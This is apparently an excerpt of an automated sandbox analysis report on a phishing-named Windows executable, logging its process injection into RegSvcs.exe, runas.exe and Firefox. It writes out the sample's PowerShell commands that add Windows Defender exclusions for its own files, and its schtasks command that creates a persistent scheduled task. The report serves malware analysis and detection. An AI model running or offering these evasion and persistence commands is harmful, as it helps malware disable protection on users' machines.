                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CAAEE mov eax, dword ptr fs:[00000030h]8_2_015CAAEE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C8A90 mov edx, dword ptr fs:[00000030h]8_2_015C8A90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159EA80 mov eax, dword ptr fs:[00000030h]8_2_0159EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159EA80 mov eax, dword ptr fs:[00000030h]8_2_0159EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159EA80 mov eax, dword ptr fs:[00000030h]8_2_0159EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159EA80 mov eax, dword ptr fs:[00000030h]8_2_0159EA80
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtClose: Direct from: 0x76F02B6C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtCreateKey: Direct from: 0x76F02C6C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtSetInformationThread: Direct from: 0x76F02B4C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtQuerySystemInformation: Direct from: 0x76F048CC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtOpenSection: Direct from: 0x76F02E0C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtSetInformationThread: Direct from: 0x76EF63F9
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtCreateFile: Direct from: 0x76F02FEC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtOpenFile: Direct from: 0x76F02DCC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtQueryInformationToken: Direct from: 0x76F02CAC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtTerminateThread: Direct from: 0x76EF7B2E
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtTerminateThread: Direct from: 0x76F02FCC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtOpenKeyEx: Direct from: 0x76F02B9C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtSetInformationProcess: Direct from: 0x76F02C5C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtCreateMutant: Direct from: 0x76F035CC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtMapViewOfSection: Direct from: 0x76F02D1C
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtResumeThread: Direct from: 0x76F036AC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtReadFile: Direct from: 0x76F02ADC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtDelayExecution: Direct from: 0x76F02DDC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtQueryInformationProcess: Direct from: 0x76F02C26
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtResumeThread: Direct from: 0x76F02FBC
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeNtCreateUserProcess: Direct from: 0x76F0371C
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\runas.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe protection: read write
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\runas.exeThread register set: target process: 7920
                      Source: C:\Windows\SysWOW64\runas.exeThread APC queued: target process: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D83008Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                      Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: nhClcdOjQwJ.exe, 00000011.00000000.1994799522.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942625769.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2942660433.0000000001410000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: nhClcdOjQwJ.exe, 00000011.00000000.1994799522.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942625769.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2942660433.0000000001410000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: nhClcdOjQwJ.exe, 00000011.00000000.1994799522.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942625769.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2942660433.0000000001410000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: nhClcdOjQwJ.exe, 00000011.00000000.1994799522.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942625769.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2942660433.0000000001410000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
